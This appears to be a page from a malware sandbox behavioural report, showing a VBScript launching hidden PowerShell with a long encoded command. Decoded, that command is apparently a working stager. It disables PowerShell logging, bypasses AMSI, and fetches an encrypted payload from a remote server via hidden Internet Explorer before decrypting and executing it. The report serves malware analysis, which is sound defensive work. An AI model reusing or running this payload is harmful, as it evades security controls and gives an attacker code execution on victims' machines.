| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Organiser.vbs
2548
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=
  2628

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents